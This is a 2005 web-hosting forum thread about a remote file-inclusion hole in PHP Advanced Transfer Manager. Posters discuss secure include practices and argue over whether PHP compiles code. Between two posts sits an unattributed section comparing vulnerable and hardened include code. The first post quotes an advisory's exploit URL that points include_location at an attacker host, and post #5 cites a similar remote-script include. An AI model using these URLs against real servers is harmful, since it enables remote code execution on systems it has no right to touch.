  1. #1

    Hole in PHP

    http://www.securitytracker.com/alert...y/1014008.html

    An include file vulnerability was reported in PHP Advanced Transfer Manager. A remote user can execute arbitrary commands on the target system.

    If allow_url_fopen is set to 'on' in the 'php.ini' configuration file, the 'include/common.php' script allows a remote user to overwrite the 'include_location' parameter.

    A remote user can supply a specially crafted URL to cause arbitrary PHP code to be included and executed by the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.

    A demonstration exploit URL is provided:

    http://[target]/index.php?include_location=http://[attacker]/

    Just wanted to pass this on.

  2. #2
    Join Date: Jun 2002 | Location: Texas | Posts: 7,953
    Moved to Technical & Security Issues.

  3. #3
    Join Date: Jan 2003 | Posts: 1,715
    It's a hole in Advanced Transfer Manager, not PHP itself, which is just doing what the script says. The description sounds like a total lack of input validation on data it directly executes. They should be hanging their head in shame at this newbie mistake.
    Game Servers are the next hot market!
    Slim margins, heavy support, fickle customers, and moronic suppliers!
    Start your own today!

  4. #4
    Join Date: Apr 2001 | Posts: 2,588
    Very misleading topic.. could that not be edited?

  5. #5
    Join Date: Sep 2002 | Location: Top Secret | Posts: 11,686
    This isn't a security flaw in php, it's caused by very poor programming, and incredibly lousy design. Unfortunately, this seems to be the standard for designers anymore.
    The solution to this problem is really quite simple:

    A> Provide a default for every switch you have, make it go back to the main part of the page, for example:

    Code:
    switch ($foo)
    {
        default:
            main();
            break;
        case 'a':
            do_a();
            break;
    }
    B> NEVER ever ever EVER use include($include). ALWAYS use include(filename.inc). The difference is quite astounding. In the first one, $include can be passed to the headers such as http://www.domain.com/include=http:/...in2.com/udp.pl , whereas the second one is ALWAYS filename.inc. This is just proper programming here, gang, nothing else.

    C> ALWAYS create your own solution, or if you MUST use third party solutions, verify that they are secure, and keep them UP TO DATE. Mods are no excuse for not keeping your crap up to date, they can ALWAYS be reapplied.

    Anyways, yes, agreed, this is not something that's a 'security' issue, more like a programming issue, and the thread should be retitled, definitely.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details

  6. #6
    Join Date: Aug 2000 | Location: Sheffield, South Yorks | Posts: 3,480
    Keep seeing this more and more, "developers" not following one of the golden rules:

    Never ever ever trust any input from your users, treat it like the Devil himself.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

  7. #7
    Join Date: Dec 2002 | Location: The Shadows | Posts: 2,913
    linux-tech: Putting the default at the start is a bad idea, as it might take that "default" branch all the time.
    Dan Sheppard ~ Freelance whatever

  8. #8
    Join Date: Aug 2000 | Location: Sheffield, South Yorks | Posts: 3,480
    No, as PHP compiles on the fly, rather than parses on the fly, so the default will only be used if none of the others match.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

  9. #9
    Join Date: Dec 2002 | Location: The Shadows | Posts: 2,913
    Um... PHP doesn't compile anything... It parses the script.

    I said "may" for a reason, since I always leave the default at the end, and never actually tested it with it at the start.
    Dan Sheppard ~ Freelance whatever

  10. #10
    Join Date: Sep 2002 | Location: Top Secret | Posts: 11,686
    Originally posted by Sheps
    linux-tech: Putting the default at the start is a bad idea, as it might take that "default" branch all the time.
    The only time it will ever use 'default' is if it doesn't find what is calling it. This will be done no matter whether it's first, last, middle or 3rd, and that's the whole purpose of default, which, in this case is to catch all that loose crap.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details

  11. #11
    Join Date: Dec 2002 | Location: The Shadows | Posts: 2,913
    Well...

    That aside. It is good coding practice to have it at the end. Readability and suchwhat.

    As far as includes and such being a danger. I normally do a:

    $allowed = array('page1','page2','page3');            // the only pages that may be included
    if( in_array($page,$allowed,true) )                   // strict (===) comparison
    {
        include('./includes/'.basename($page).'.php');    // fixed directory and fixed extension
    }

    That said. I have given up on includes completely and now use dynamic MySQL pages for content and templates.
    Dan Sheppard ~ Freelance whatever

  12. #12
    Join Date: Sep 2002 | Location: Top Secret | Posts: 11,686
    In programming, there is no "right way" and "wrong way" to do things, there is almost always more than one way to do things. The placement of 'default' from what I've seen, in switch() statements has always been @ the top, but that's not saying it's the "right way" to do things. Stating that placing one statement at the top, or at the bottom of anything is better than the other is, well, it's not exactly the best way to do things.

    As far as the global include of pages, even if $allowed is called, I'd say it's still too risky to do that. Realistically, all you have to do is add the page to the switch() statement and go from there, thusly you're not using any global defines at all, when it comes to including stuff.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details
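The include pattern the advisory in post #1 describes, next to the allowlisted dispatcher that posts #5, #11 and #12 argue for, as an added PHP example that is not code from the advisory or from any poster; the page keys, the includes directory and the function names are assumptions:

```php
<?php
// Added example (not the advisory's or any poster's code). Page keys, the
// includes directory and the function names are illustrative assumptions.

// VULNERABLE: the included path comes straight from the request. With
// allow_url_fopen on, a remote URL is fetched and executed as PHP.
function vulnerable_dispatch(array $get): void
{
    include $get['include_location'];   // user-controlled, never validated
}

// HARDENED: the request only selects a key; every filename is a server-side
// constant, so no user-supplied string ever reaches include().
const PAGES = [
    'home'    => __DIR__ . '/includes/home.php',
    'about'   => __DIR__ . '/includes/about.php',
    'contact' => __DIR__ . '/includes/contact.php',
];

// Map the request to a fixed path; anything unknown falls back to 'home',
// which is the role of the 'default' branch in post #5's switch().
function safe_dispatch(array $get): string
{
    $page = $get['page'] ?? 'home';
    if (!is_string($page) || !array_key_exists($page, PAGES)) {
        $page = 'home';
    }
    return PAGES[$page];
}

// Defence in depth: even with constant paths, refuse anything that does not
// resolve inside the includes directory before loading it.
function load_page(array $get): void
{
    $base = realpath(__DIR__ . '/includes');
    $path = realpath(safe_dispatch($get));
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        return;
    }
    include $path;
}

load_page($_GET);
```

Pairing this with allow_url_include = Off (and allow_url_fopen = Off where nothing needs it) in php.ini removes the remote-include path entirely, so the code-level allowlist is not the only thing standing between the request and include().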

  13. #13
    Join Date: Aug 2000 | Location: Sheffield, South Yorks | Posts: 3,480
    Originally posted by Sheps
    Um... PHP doesn't compile anything... It parses the script.
    Err.... actually it does, it compiles it to an intermediate state, then executes it. Hence why you have the Zend Encoder, Zend Cache etc. The Encoder not only obfuscates the code, it compiles it to the intermediate format ready for execution by the Zend Optimizer/Loader, and the Zend Cache, works by storing the compiled intermediate for non-encoded scripts, so that it doesn't have to be compiled every time. Having worked with PHP since very early 3.0.x days, I'm pretty aware of how it works by now.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

  14. #14
    Join Date: Apr 2001 | Location: Pittsburgh, PA | Posts: 1,304
    Originally posted by linux-tech
    The placement of 'default' from what I've seen, in switch() statements has always been @ the top, but that's not saying it's the "right way" to do things.
    Well, in C and C++, it's the "right way", as execution does proceed from top to bottom, with cases falling through unless they encounter a "break" statement.

    My point being that it's a useful convention even when working in another language.

    Kevin

  15. #15
    Join Date: Dec 2002 | Location: The Shadows | Posts: 2,913
    KDA: PHP is NOT a compiler. It is a script parser. It happens to read all the script in before executing it though, and it does transform code into machine instructions, but it does not produce an executable, which is a fundamental requirement of any compiler.

    Now, if you are talking about when you encode PHP with Zend Encoder or you are using Zend Optimizer, you are compiling it into bytecode, and it is then not completely handled by the php binary by itself, but the zend extension which it requires to run byte code. If it was a JIT compiler, it would already have the functionality to run byte code built in and would need extensions to be loaded.

    And just because you work with "PHP" since v3.x doesn't mean you know anything about its inner workings.

    Now, let's look at some actual compilers, like java. The javac program actually creates a bytecode file, which is then read and executed by the platform specific java executable.

    PHP scripts are in plain text, unless of course you use an encoder of some form or another.
    Last edited by Sheps; 05-23-2005 at 10:22 AM.
    Dan Sheppard ~ Freelance whatever

  16. #16
    Join Date: Aug 2000 | Location: Sheffield, South Yorks | Posts: 3,480
    Without the Zend Accelerator for PHP 5, every time a PHP script is accessed, it is parsed and compiled by the Zend Engine II (PHP 5's scripting engine) before it is executed.
    It is not an interpreted language, an interpreter reads a program line by line then executes it, PHP does not do that, it parses the file for syntax errors, then it compiles it to byte code (I never said it was a JIT compiler, those are your words not mine, I'm well aware of how JIT works).

    The Zend Engine (and thus PHP) actually creates a byte code object, it's just that it happens to run it then discard it - Now I'm sure if you grab the source, you're more than free to actually write a handler that will save that Byte code for you.
    Last edited by Karl Austin; 05-23-2005 at 10:42 AM.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

  17. #17
    Join Date: Dec 2002 | Location: The Shadows | Posts: 2,913
    You want to give me a link to where you found that? I can't seem to find it anywhere.

    I am sure if it were remotely true, it would actually be on a php.net page.

    http://www.google.com/search?num=100...et&btnG=Search
    Dan Sheppard ~ Freelance whatever

  18. #18
    Join Date: Aug 2000 | Location: Sheffield, South Yorks | Posts: 3,480
    http://www.zend.com/store/products/z...erator/how.php

    First paragraph and as it's the Zend Engine that does the main work for PHP, I think they should know how it works. Spoon for that pie?

    Yes in the true sense of the definition, PHP itself is not a compiler, nor is the Zend Engine, but the code is compiled, not interpreted.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

  19. #19
    Join Date: Dec 2002 | Location: The Shadows | Posts: 2,913
    Oh, and FYI:

    http://www.zend.com/store/products/z...e-in-depth.php

    Even Zend, the makers of the Zend engine acknowledge that it is a parser. Not a compiler.
    Dan Sheppard ~ Freelance whatever

  20. #20
    Join Date: Aug 2000 | Location: Sheffield, South Yorks | Posts: 3,480
    Well of course it is a parser, every compiler is a parser, else it'd never be able to tokenize the code and compile it, the very next couple of words state in-memory compilation - i.e. It is not interpreted, most people seem to think parser == interpreter. The Zend Engine, executes compiled PHP code, yes it has been parsed, but that has to happen.

    If PHP were interpreted, then part of a script would execute and you'd get output (if it was doing output) before you got an error for a missing ;, ", {, } etc. but as it is, you don't, because the code is first parsed then compiled and executed, not interpreted line by line.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.
